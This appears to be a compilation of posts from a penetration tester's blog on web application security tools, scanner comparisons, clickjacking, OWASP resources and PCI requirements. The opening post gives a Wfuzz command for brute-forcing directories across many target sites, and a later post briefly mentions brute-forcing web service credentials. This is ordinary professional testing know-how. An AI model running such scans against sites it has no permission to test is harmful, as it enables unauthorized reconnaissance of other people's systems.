Massive Web Application discovery with Wfuzz

Last week i had to review like 40 websites for a penetration test in a short period of time, so the first thing i wanted was to search for directories or files in the web servers, so how can i automate the full scan with Wfuzz? We can use a command like this:

$ wfuzz -c -z file -f urllist.txt,dictionary.txt --html --hc 404 http://FUZZ/FUZ2Z 2> results.html

The first FUZZ will be replaced with the content of urllist.txt, where you should have the websites address in the format "www.target.com", and the second FUZ2Z will be replaced with the dictionary, in my case i used the big.txt.

Soon i will release an update of Webslayer, and will show how to do this with it.

Enjoy!

Laramies

Web Services Security testing

Last week  i had to perform a penetration test on a Web Services environment and during the project i found the following interesting documents:

SIFT  - Web Services Security Testing Framework  V1  - by SIFT  Link

This document is a great resource.

Web Services Security  - by Bilal Saddiqui Link

Exploring Web Services Encryption - by Bilal Saddiqui   Link

More on Web Services Encryption - by Schmoil Link

Seguridad en Servicios Web (Spanish) - by Oscar Gonzales Link

About the tools, i had some trouble with the usual hacking tools, we didn't had UDDI or JUDDI, so we had to hack the application server (Jboss) and then access the Web services admin panel, to get the WSDL.

With the WDSL i proceed to perform some bruteforce attacks with WebSlayer to find a valid username and password for the WS-Security (client authentication).

The other tool that i used was Appscan, Web Services Power tools that allowed me to get the descriptions, and perform request, but i didn't liked the way it handle the raw request...

Another interesting tools is the SOAPUI, the web services testing tool, it's very complete and i'm still learning on how to use it....

Also we used WSFuzzer from OWASP. Here is a video on how to use it

UPDATE:

TSSCI - Writing a web services fuzzer in 5 minutes

Any other interesting tools or document?

-CMM

Protecting users from password theft

A very good article from Chris Eng (Veracode), about how developers can design a strong password scheme in the applications to protect users from password theft. 

Suppose that your database is stolen (hope no) is  the data protected? the thiefs could revert back the passwords easily?  In my lasts pentest the passwords were stored in clear texts..... so it's common practice to have the password stored in an insecure way, or even clear text.

Here is a good practice for your developers or customers:

Veracode - How to protect your users from password theft

-CMM

Web Application vulnerability scanners comparison

Today a saw a message from "Anantasec" in the mailing "pen-test" about a evaluation/comparison of Web Application scanners. 

The products analyzed are IBM Appscan (7.7.620 SP2), HP Webinspect (7.7.869)  and Acunetix (6.0), all commercial products.

The analysis only evaluate the results of the scans against 16 applications, it doesn't compare features, options or capabilities of the products.

After reading the report i have some doubts about the origin of it. Maybe could be a biased analysis for Acunetix? It's an Anonymous writer, a blog with just one post.. it makes me wonder. (damn, no interesting metadata in the document )

Personally i used all the scanners and i'm happy with Appscan, i'm missing the scheduling option of Webinspect. Also Acunetix improved a lot in the latest versions, and could be an interesting option when considering price/value.

An interesting fact of the analysis is that each of the scanners performed better when scanning the demo application of their company :)

 

Here is the report from Anantasec, draw your own conclusions

Remember to use more than one tool for the task, to have complimentary result, and also that the scanner will not discover all the vulnerabilities on the application, so don't rely on them.

I always use ProxyStrike when doing the manual analysis of the application, and i discover XSS and SQL that none of the scanners mentioned before does. Btw a new version is coming!

If you want more options on Web application scanners don't forget the Open Source options, right now there is a clear leader in this field, W3aF, it's very complete and even have more plugins or checks than the commercials one, and is multi-platform.

What are you using?

-CMM

Top 25 Most dangerous coding errors

A joint effort between CWE (Common Weakness Enumeration) and SANS, and with the participation of experts in the field, produced the "Top 25 most dangerous coding errors"  a list of the most significant programming errors that can lead to serious software vulnerabilities, this document will impact in many areas like:

• Software buyers will be able to buy much safer software. ( with a certificate of code beign free of these 25 bugs)
  
• Programmers will have tools that consistently measure the security of the software they are writing.
• Colleges will be able to teach secure coding more confidently.
• Employers will be able to ensure they have programmers who can write more secure code. 

"The main goal of the Top 25 list is to stop vulnerabilities at the source by educating programmers on how to eliminate all-too-common mistakes before software is even shipped."

This is a good initiative to have a very brief list of programming errors, so the programmers could use as a guide, the language and examples used are very easy to understand and i guess this will facilitate the adoption by the programmers.

There is a lot of information about secure coding at OWASP, but i guess that this simple guide will be easier to use, than OWASP documentation.

Hope programmers start to use it :)

You can check the list here

-CMM

OWASP Testing Guide v3.0

The new testing guide was released the 18 of December, this is a great project, and very useful for penetration testers.  This version is very complete and is more clean than the previous versions.

You can download here:

http://www.owasp.org/index.php/OWASP_Testing_Project

-CMM

Jsky - a free Web Application Scanner

A new free Web application Scanner is out, from the same author of Pangolin (a good SQL Injection tool). The scanner looks pretty solid and complete for an alpha version; the list of checks is the following:

• SQL Injection
• XSS
• Unsecure object using
• Local path disclosure
• Unsecure directory permissions
• Server vulnerabilities like buffer overflow and configure error
• Possible sensitive directories and files scan
• Backup files scan
• Source code disclosure
• Command Execute
• File Include
• Web backdoor
• Sensitive information
• And so much more......

It also claims  that also exploits the vulnerabilities, but i didn't try that option yet.

Here is a screenshot of the tool in action:

You can download it from here

-CMM

Clickjacking Demo

A lot of buzz were flowing on the net the last few months , about a new type of vulnerability known as "ClickJacking" or "Ui redressing". The vulnerability is a variant of Cross Site Request Forgery (CSRF). The idea is simple, here is an explanation found in www.webmonkey.com:

"The basic idea is that an attacker loads the content of an external site into the site you’re visiting, sets the external content to be invisible and then overlays the page you’re looking at. When you click a link you see on the current page, you are in fact clicking on the externally loaded page and about to load pretty much whatever the attacker wants."

Well it seems pretty easy and clear, but if you want to see an attack in action, you have to check this GUYA.NET, where an attacker controls the camera of the victim, through a ClickJacking attack.

Some of you might be wondering how can you protect against it? The last version of NoScript (a Firefox Plugin that provides protection against XSS) adds protection to ClickJacking.

Be careful where you click ;)

CMM-

EnDe - Complete web Encoder Decoder

Always in a web application analysis you end up looking for a fast way to convert/encode/decode/transform a string or a piece of text; there are a lot of online encoders/decoders but they are very specific, if you want a one stop with all you can need, enter EnDE. 

I came across EnDe in the OWASP Project page, it is described as:

"Encoder, Decoder, Converter, Transformer, Calculator, for various codings used in the wild wide web"

That's for sure, it has an extensive list of encoders, decoders, hashes, encryption, also you can transform dates, create regexp in different languages.

You can check EnDe in the OWASP page or in the tool website 

Enjoy

OWASP Spain Chapter Meeting

The next 21 of November i will be participating as speaker in the OWASP Spain Chapter Meeting, i will give a talk about Information Gathering, the key point of the presentation is to show new techniques on how you can gather interesting information about a target (individual or company) and how can you use it in a penetration test. I will talk about my tools, and some online sites that provide interesting information.

If you want to join us, remember the 21 of November, place IL3 - Institute for LifeLong Learning (Universitat de Barcelona)

Link: Owasp

PCI Requirement 666, sorry 6.6

After all the discussion around the PCI DSS requirement 6.6, on what were the real requirements, we can conclude that from June 30 (2008) there are two options for the web applications requirement:

1- Application Code review, that is subdivided in the following alternatives:

• Manual review of application source code
  
• Proper use of automated source code analyzer (scanning) tools
  
• Manual web application security vulnerability assessments
  
• Proper use of automated web application security vulnerability assessment (scanning)  tools.

2- Web application Firewall

I think that we should have both options implemented, there are not exclusive and implementing just the Manual web application as Code Review would not assure the security of the application, because maybe between the discovery of the vulnerabilities and the patching/correcting/solving phase will pass some time that the application will be exposed, also new vulnerabilities introduced after the Manual Web Application Assessment, will put in jeopardy the security of the application.

Another interesting point is the alternative 4 of the option 1 "Proper use of automated web application security vulnerability assessment tool", what is considered "Proper" ?   I imagine a lot of "tool monkeys" launching automatic scanners, printing the tool report and justifying requirement 6.6 for two pennies, and then you will have to explain to your customer why your service is more expensive than the other.... 

It's always the same :(

More to come on this issue,

RedIris Conference

Hi all, the thursday 27 i will be talking on the "VI Foro de Seguridad RedIris", the topic of this Forum will be Web Application security. My talk is about "Common application security vulnerabilities" aka "The Usual Suspects". I will make an overview of the most common vulnerabilities, based on the OWASP Top 10.

If you want to have a good time and learn more about Web Application Security this could be a good oportunity.

The conference program can be checked here

See you there!

Ajax security

Are you interested in learning about Ajax security? I did, so i got the book "Ajax Security" by Hoffman and Sullivan (2007, Addison Wesley, 470 pages), and it is really useful. The book is well organized, the explanations are very clear and the examples well chosen.

I learned a lot about Ajax and the security implications of this technology with this book, i highly recommend it.


Ajax Security, Addison Wesley

Check the content table